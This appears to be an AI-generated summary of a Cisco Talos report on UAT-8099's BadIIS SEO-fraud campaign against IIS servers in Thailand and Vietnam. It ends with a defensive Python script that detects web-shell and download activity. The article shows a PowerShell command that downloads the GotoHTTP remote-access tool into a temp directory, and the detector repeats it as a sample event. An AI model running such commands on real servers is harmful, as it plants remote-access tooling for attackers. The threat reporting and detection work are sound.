China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware
These articles are AI-generated summaries. Please check the original sources for full details.
The China-linked threat actor UAT-8099 has been attributed to a new campaign targeting vulnerable Internet Information Services (IIS) servers across Asia, with a specific focus on Thailand and Vietnam, using the BadIIS malware for regional SEO fraud. The campaign, discovered by Cisco Talos, involves exploiting IIS servers to facilitate search engine optimization (SEO) fraud, with the scale of the campaign currently unknown.
Why This Matters
The UAT-8099 campaign shows how far deployed IIS servers fall short of an ideal security posture: the threat actor gains initial access by exploiting weak settings in web server file upload features and unpatched security vulnerabilities. The campaign's focus on regional SEO fraud, targeting specific countries and languages, shows that threats are tailored to their victims and that defensive measures must be tailored in turn; the potential costs include compromised server integrity and reputational damage.
Key Insights
- UAT-8099 uses web shells and PowerShell to execute scripts and deploy the GotoHTTP tool, granting remote access to vulnerable IIS servers (Cisco Talos, 2026).
- The BadIIS malware is customized to target specific regions, with variants such as BadIIS IISHijack and BadIIS asdSearchEngine targeting victims in Vietnam and Thailand, respectively (Cisco Talos, 2026).
- The threat actor leverages legitimate tools, such as SoftEther VPN and EasyTier, to control compromised IIS servers and evade detection (Cisco Talos, 2026).
Working Example
# Example of PowerShell command used to deploy GotoHTTP tool
powershell -Command "Invoke-WebRequest -Uri https://example.com/GotoHTTP.exe -OutFile C:\Windows\Temp\GotoHTTP.exe"
Practical Applications
- Use Case: Companies with IIS servers in Asia, particularly in Thailand and Vietnam, should prioritize security updates and monitoring to prevent BadIIS malware infections.
- Pitfall: Failing to restrict file upload features and neglecting regular security audits can lead to exploitation by threat actors like UAT-8099, resulting in compromised server integrity and SEO fraud.
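As an added example (not code from the article or from Cisco Talos), the following Python script shows one way a defender could detect the activity summarized in the Working Example and Key Insights above: it scans process-creation events for an IIS worker process (w3wp.exe) spawning a shell interpreter, which is the footprint of web shell use, and for PowerShell download commands that stage an executable in a temp directory. The pipe-delimited event format, the sample log lines and the rule names are constructed for this example and are assumptions, not a real capture or a published detection rule.

```python
"""Flag process-creation events that match the post-exploitation pattern
the article describes: the IIS worker process spawning a shell, and a
PowerShell command line that downloads an executable to a staging directory.

Event format (assumed for this example): "parent image|child image|command line".
"""
import re

# Constructed sample events; they are made up for this example and are not
# taken from the Talos report. Event 0 mirrors the article's Working Example.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r'powershell -Command "Invoke-WebRequest -Uri https://example.com/GotoHTTP.exe -OutFile C:\Windows\Temp\GotoHTTP.exe"',
    r"C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|"
    r"powershell -File C:\Scripts\backup.ps1",
    r"C:\Windows\System32\inetsrv\w3wp.exe|C:\Windows\System32\cmd.exe|"
    r"cmd /c dir C:\inetpub\wwwroot",
    r"C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|"
    r"svchost.exe -k netsvcs",
]

IIS_WORKER = "w3wp.exe"                      # IIS worker process image name
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}  # interpreters a web shell typically spawns
# PowerShell download cmdlet (or its common aliases) writing an .exe via -OutFile
DOWNLOAD_RE = re.compile(
    r"(invoke-webrequest|iwr|curl|wget)\b.*?-outfile\s+(\S+\.exe)", re.IGNORECASE
)
# Directories commonly used to stage tooling because any user can write there
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(line):
    """Return the list of rule names an event triggers (empty if benign)."""
    parent, image, cmdline = line.split("|", 2)
    findings = []
    # Rule 1: the IIS worker process should never spawn an interactive shell.
    if basename(parent) == IIS_WORKER and basename(image) in SHELLS:
        findings.append("iis-worker-spawned-shell")
    # Rule 2: a download cmdlet writing an executable to disk.
    match = DOWNLOAD_RE.search(cmdline)
    if match:
        target = match.group(2)
        findings.append("download-executable:" + target)
        # Rule 3: the executable lands in a world-writable staging directory.
        if target.lower().startswith(STAGING_DIRS):
            findings.append("staged-in-temp")
    return findings


def scan(events):
    """Return {event index: findings} for every event that triggered a rule."""
    results = {}
    for index, event in enumerate(events):
        findings = analyse_event(event)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: {', '.join(findings)}")
```

Rule 1 is the high-signal one: on a correctly configured IIS server the worker process has no reason to launch PowerShell or cmd.exe, so a single hit deserves investigation regardless of the command line. Rules 2 and 3 are there to rank the alert, not to replace it, since a download that stages an executable in a temp directory is also common in ordinary administration scripts.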